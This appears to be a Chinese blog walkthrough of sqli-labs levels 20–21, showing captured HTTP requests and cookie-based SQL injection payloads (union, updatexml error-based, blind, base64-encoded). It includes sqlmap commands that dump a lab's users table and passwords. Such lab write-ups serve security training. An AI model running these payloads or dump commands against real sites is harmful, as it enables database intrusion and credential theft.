![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132509-6899ef35d4999.png\")
<\/p>\n\n
<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132510-6899ef364a2c9.png\")
<\/p>\n
\u8f93\u5165admin:admin,\u6210\u529f\u767b\u5f55<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132512-6899ef3856d1e.jpg\")
<\/p>\n
bp\u6293\u53d6http\u5934\u5185\u5bb9<\/p>\n
GET \/sqli-labs\/Less-20\/index.php HTTP\/1.1
\nHost: 192.168.0.107
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko\/20100101 Firefox\/141.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
\nAccept-Encoding: gzip, deflate, br
\nConnection: keep-alive
\nCookie: uname=admin
\nUpgrade-Insecure-Requests: 1
\nPriority: u=0, i<\/p>\n
Cookie: uname=admin' \u62a5\u9519,\u5224\u65ad\u5b57\u7b26\u578b\u6ce8\u5165,'\u95ed\u5408\u65b9\u5f0f
\nCookie: uname=admin' or '1'='1 \u6b63\u5e38\u56de\u663e
\nCookie: uname=admin' or 1=1–+ \u6b63\u5e38\u56de\u663e,\u786e\u5b9a\u5b57\u7b26\u578b\u6ce8\u5165,'\u95ed\u5408\u65b9\u5f0f<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132514-6899ef3a10913.jpg\")
<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132515-6899ef3bd016b.jpg\")
<\/p>\n
Cookie: uname=admin' and updatexml(7,concat(0x7e,version()),9)–+<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132517-6899ef3dbebb2.jpg\")
<\/p>\n
Cookie: uname=admin' order by 3–+ \u6b63\u5e38\u56de\u663e
\nCookie: uname=admin' order by 4–+ \u62a5\u9519,\u5b57\u6bb5\u6570\u4e3a3<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132519-6899ef3f56907.jpg\")
<\/p>\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132520-6899ef40dc8ba.jpg\")
<\/p>\n
Cookie: uname=-admin' union select 7,8,database()–+<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132521-6899ef41b24fe.jpg\")
<\/p>\n
Cookie: uname=-admin' union select 7,8,group_concat(table_name) from information_schema.tables where table_schema='security'–+<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132522-6899ef428415b.jpg\")
<\/p>\n
Cookie: uname=-admin' union select 7,8,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'–+<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132523-6899ef432d745.jpg\")
<\/p>\n
Cookie: uname=-admin' union select 7,8,group_concat(id,0x7e,username,0x3a,password) from users–+<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132523-6899ef43bdfea.jpg\")
<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132524-6899ef444f012.jpg\")
<\/p>\n
GET \/sqli-labs\/Less-20\/index.php HTTP\/1.1
\nHost: 192.168.0.107
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko\/20100101 Firefox\/141.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
\nAccept-Encoding: gzip, deflate, br
\nConnection: keep-alive
\nCookie: uname=admin
\nUpgrade-Insecure-Requests: 1
\nPriority: u=0, i<\/p>\n
vi sql.txt <\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132524-6899ef44a2382.jpg\")
<\/p>\n
sqlmap -r sql.txt –level 3 –risk 3 –thread="10" -batch –current-db<\/p>\n
\u53d1\u73b0\u662fcookie\u6ce8\u5165<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132524-6899ef44b0a06.jpg\")
<\/p>\n
\u589e\u52a0cookie\u6307\u4ee4<\/p>\n
sqlmap -r sql.txt –level 3 –risk 3 –thread="10" -batch –cookie="*" -D security –tables<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132524-6899ef44ddeaf.jpg\")
<\/p>\n
sqlmap -r sql.txt –level 3 –risk 3 –thread="10" -batch –cookie="*" -D security -T users –columns <\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132524-6899ef44f04b8.jpg\")
<\/p>\n
sqlmap -r sql.txt –level 3 –risk 3 –thread="10" -batch –cookie="*" -D security -T users –dump<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132525-6899ef45108bc.jpg\")
<\/p>\n
\u2192 \u4f18\u5148\u9009\u62e9\u8054\u5408\u67e5\u8be2\u6ce8\u5165(Union-Based)
\n\u6d41\u7a0b:<\/p>\n
a.\u5224\u65ad\u95ed\u5408\u65b9\u5f0f(\u6570\u5b57\u578b\/\u5b57\u7b26\u578b)<\/p>\n
b.ORDER BY \u786e\u5b9a\u5b57\u6bb5\u6570<\/p>\n
c.UNION SELECT \u5b9a\u4f4d\u56de\u663e\u4f4d(\u5982 id=-1' union select 1,2,3–+)<\/p>\n
d.\u901a\u8fc7\u56de\u663e\u4f4d\u63d0\u53d6\u6570\u636e(database(), version())<\/p>\n
\u9002\u7528\u573a\u666f:\u641c\u7d22\u7ed3\u679c\u9875\u3001\u7528\u6237\u4fe1\u606f\u5c55\u793a\u9875<\/p>\n
\u2192 \u6539\u7528\u62a5\u9519\u6ce8\u5165(Error-Based)<\/p>\n
a.\u89e6\u53d1\u62a5\u9519\u51fd\u6570:updatexml(), extractvalue(), floor()<\/p>\n
?id=1' and updatexml(1,concat(0x7e,(select database())),1)–+<\/p>\n
b.\u4ece\u62a5\u9519\u4fe1\u606f\u63d0\u53d6\u654f\u611f\u6570\u636e(\u5982\u7248\u672c\u3001\u8868\u540d)<\/p>\n
c.\u8d8530\u5b57\u7b26\u65f6\u7528 substring() \u5206\u6bb5\u83b7\u53d6<\/p>\n
\u4f18\u52bf:\u65e0\u9700\u56de\u663e\u4f4d,\u76f4\u63a5\u5229\u7528\u9519\u8bef\u4fe1\u606f\u6cc4\u9732\u6570\u636e<\/p>\n
\u2192 \u91c7\u7528\u5e03\u5c14\u76f2\u6ce8(Boolean-Based)
\n\u6d41\u7a0b:<\/p>\n
a.\u6784\u9020\u771f\u5047\u6761\u4ef6\u5224\u65ad\u957f\u5ea6:<\/p>\n
?id=1' and length(database())=8–+ <\/p>\n
b.\u9010\u5b57\u7b26\u7206\u7834\u5185\u5bb9(\u7ed3\u5408 substr() + ascii()):<\/p>\n
?id=1' and ascii(substr(database(),1,1))>97–+<\/p>\n
c.\u6839\u636e\u9875\u9762\u72b6\u6001\u5dee\u5f02(\u5982\u201c\u5b58\u5728\u8bb0\u5f55\u201d vs \u201c\u65e0\u7ed3\u679c\u201d)\u63a8\u65ad\u6570\u636e<\/p>\n
\u2192 \u4f7f\u7528\u65f6\u95f4\u76f2\u6ce8(Time-Based)
\n\u6d41\u7a0b:<\/p>\n
a.\u6ce8\u5165\u5ef6\u65f6\u51fd\u6570\u89e6\u53d1\u6761\u4ef6\u5224\u65ad:<\/p>\n
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)–+ <\/p>\n
b.\u901a\u8fc7\u54cd\u5e94\u5ef6\u8fdf(\u59825\u79d2)\u786e\u8ba4\u5b57\u7b26\u6b63\u786e\u6027<\/p>\n
c.\u4f9d\u8d56\u51fd\u6570:sleep()(MySQL)\u3001pg_sleep()(PostgreSQL)<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132525-6899ef4524579.png\")
<\/p>\n
pb\u6293\u53d6http\u5934
\nvi sql.txt
\nsqlmap -r sql.txt –level 3 –risk 3 –thread="10" -batch –current-db \u8dd1\u5f53\u524d\u6570\u636e\u5e93
\nsqlmap -r sql.txt –level 3 –risk 3 –thread="10" -D security –tables \u6839\u636e\u8dd1\u51fa\u7684\u6ce8\u5165,\u6dfb\u52a0\u65b0\u7684\u6307\u4ee4
\nsqlmap -r sql.txt –level 3 –risk 3 –thread="10" -batch -D security -T users –columns
\nsqlmap -r sql.txt –level 3 –risk 3 –thread="10" -batch -D security -T users –dump<\/p>\n
\n
![\"\"](\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250811132526-6899ef46af4cc.jpg\")
<\/p>\n
\n
![\"\"](\"2025-08-11tdoioldjmbj.jpg\")
<\/p>\n
\u8f93\u5165admin:admin,\u6210\u529f\u767b\u5f55<\/p>\n
\n
![\"\"](\"2025-08-11prqnxc3nxab.jpg\")
<\/p>\n
bp\u6293\u53d6http\u5934\u5185\u5bb9<\/p>\n
GET \/sqli-labs\/Less-21\/index.php HTTP\/1.1
\nHost: 192.168.0.107
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko\/20100101 Firefox\/141.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
\nAccept-Encoding: gzip, deflate, br
\nConnection: keep-alive
\nCookie: uname=YWRtaW4%3D
\nUpgrade-Insecure-Requests: 1
\nPriority: u=0, i<\/p>\n
\n
![\"\"](\"2025-08-11elw0wmhgpzs.jpg\")
<\/p>\n
\u53d1\u73b0cookie\u4e2duname\u503c\u88abbase64\u52a0\u5bc6\u4e86<\/p>\n
Cookie: uname=admin' \u62a5\u9519,\u5224\u65ad\u5b57\u7b26\u578b\u6ce8\u5165,'\u95ed\u5408\u65b9\u5f0f
\nCookie: uname=admin' or '1'='1 \u6b63\u5e38\u56de\u663e,\u5224\u65ad\u5b57\u7b26\u578b\u6ce8\u5165,'\u95ed\u5408\u65b9\u5f0f
\nCookie: uname=admin' or 1=1# \u62a5\u9519,\u5426\u5b9a'\u95ed\u5408\u65b9\u5f0f
\nCookie: uname=admin') or 1=1# \u6b63\u5e38\u56de\u663e,\u5224\u65ad\u5b57\u7b26\u578b\u6ce8\u5165,')\u95ed\u5408\u65b9\u5f0f<\/p>\n
\n
![\"\"](\"2025-08-11pxsa0kxp51k.jpg\"){kind=spacer}
<\/p>\n
admin') and updatexml(7,concat(0x7e,version()),9)#
\nYWRtaW4nKSBhbmQgdXBkYXRleG1sKDcsY29uY2F0KDB4N2UsdmVyc2lvbigpKSw5KSM%3d<\/p>\n
\n
![\"\"](\"2025-08-11pfqnlsxgqne.jpg\")
<\/p>\n
\u4e0e\u7b2c19\u5173\u5176\u5b9e\u662f\u4e00\u6837\u7684,\u5c31\u662f\u591a\u4e86\u4e00\u4e2abase64\u52a0\u5bc6,\u7b2c19\u5173\u6211\u7528\u4e86\u8054\u5408\u67e5\u8be2union select ,\u8fd9\u91cc \u5c31\u7528\u62a5\u9519\u6ce8\u5165<\/p>\n
admin') and updatexml(7,concat(0x7e,(select database())),9)#
\nYWRtaW4nKSBhbmQgdXBkYXRleG1sKDcsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSksOSkj<\/p>\n
\n
![\"\"](\"2025-08-11b3reboeiupp.jpg\")
<\/p>\n
admin') and updatexml(7,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),9)#
\nYWRtaW4nKSBhbmQgdXBkYXRleG1sKDcsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSksOSkj<\/p>\n
\n
![\"\"](\"2025-08-1144hceudojrh.jpg\")
<\/p>\n
admin') and updatexml(7,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),9)#
\nYWRtaW4nKSBhbmQgdXBkYXRleG1sKDcsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgYW5kIHRhYmxlX25hbWU9J3VzZXJzJykpLDkpIw%3d%3d<\/p>\n
\n
![\"\"](\"2025-08-11eb0q3bwlziu.jpg\")
<\/p>\n
admin') and updatexml(7,concat(0x7e,(select group_concat(id,0x7e,username,0x3a,password) from users)),9)#
\nYWRtaW4nKSBhbmQgdXBkYXRleG1sKDcsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoaWQsMHg3ZSx1c2VybmFtZSwweDNhLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSksOSkj<\/p>\n
\u8054\u5408\u67e5\u8be2\u6700\u540e\u7684\u8d26\u53f7\u5bc6\u7801\u662f\u5b8c\u6574\u7684,\u62a5\u9519\u6ce8\u5165\u56e0\u4e3a\u56de\u663e\u957f\u5ea6\u7f18\u6545,\u8d26\u53f7\u5bc6\u7801\u4e0d\u5b8c\u6574,\u5f97\u7528limit 0,1\u6765\u4e00\u4e2a\u4e2a\u56de\u663e,\u6bd4\u8f83\u9ebb\u70e6,\u8fd9\u6837\u770b\u6765\u80fd\u7528\u8054\u5408\u67e5\u8be2\u7684\u8bdd,\u8fd8\u662f\u7528\u8054\u5408\u67e5\u8be2\u7684\u597d\u3002<\/p>\n
\n
![\"\"](\"2025-08-11cqykfrjdnip.jpg\")
<\/p>\n
admin') and updatexml(7,concat(0x7e,(select username from users limit 7,1)),9)#
\nadmin') and updatexml(7,concat(0x7e,(select password from users limit 7,1)),9)#<\/p>\n
\n
![\"\"](\"2025-08-11hv0tz2ufrwv.jpg\")
<\/p>\n
![\"\"](\"2025-08-11heyjoany1fd.jpg\")
<\/p>\n
GET \/sqli-labs\/Less-21\/index.php HTTP\/1.1
\nHost: 192.168.0.107
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko\/20100101 Firefox\/141.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
\nAccept-Encoding: gzip, deflate, br
\nConnection: keep-alive
\nCookie: uname=YWRtaW4%3D
\nUpgrade-Insecure-Requests: 1
\nPriority: u=0, i<\/p>\n
\u53d1\u73b0cookie\u7684uname\u6709base64\u52a0\u5bc6<\/p>\n
vi sql.txt <\/p>\n
\n
![\"\"](\"2025-08-11pqj5qss2xjm.jpg\")
<\/p>\n
\u589e\u52a0 –tamper="base64encode.py"<\/p>\n
sqlmap -r sql.txt –level 3 –risk 3 –thread="10" –tamper="base64encode.py" -batch –current-db<\/p>\n
\u53d1\u73b0\u662fcookie\u6ce8\u5165<\/p>\n
\n
![\"\"](\"2025-08-115pxkciezykh.jpg\")
<\/p>\n
\u589e\u52a0–cookie="*"<\/p>\n
sqlmap -r sql.txt –level 3 –risk 3 –thread="10" –tamper="base64encode.py" -batch –cookie="*" -D security –tables<\/p>\n
\n
![\"\"](\"2025-08-11bkfsbz00sac.jpg\")
<\/p>\n
sqlmap -r sql.txt –level 3 –risk 3 –thread="10" –tamper="base64encode.py" -batch –cookie="*" -D security -T users –columns<\/p>\n
\n
![\"\"](\"2025-08-11czsiio3nxts.jpg\")
<\/p>\n
sqlmap -r sql.txt –level 3 –risk 3 –thread="10" –tamper="base64encode.py" -batch –cookie="*" -D security -T users –dump<\/p>\n
\n
![\"\"](\"2025-08-11e3ybmjn30mv.jpg\")
<\/p>\n
\n
![\"\"](\"2025-08-11t5kncmk2lwb.jpg\")
<\/p>\n
\n
![\"\"](\"2025-08-112bbzumg55id.jpg\")
<\/p>\n
\n
![\"\"](\"2025-08-11qygt0oructw.jpg\")
<\/p>\n
\u95ed\u5408\u65b9\u5f0f"<\/p>\n
\u5176\u4ed6\u540c\u7b2c21\u5173<\/p>\n","protected":false},"excerpt":{"rendered":"
\u6587\u7ae0\u6d4f\u89c8\u9605\u8bfb249\u6b21\uff0c\u70b9\u8d5e8\u6b21\uff0c\u6536\u85cf3\u6b21\u3002\uff081\uff09\u5224\u65ad\u56de\u663e\u72b6\u6001\uff0c<\/p>\n","protected":false},"author":2,"featured_media":52904,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[4761],"topic":[],"class_list":["post-52924","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-server","tag-sql"],"yoast_head":"\n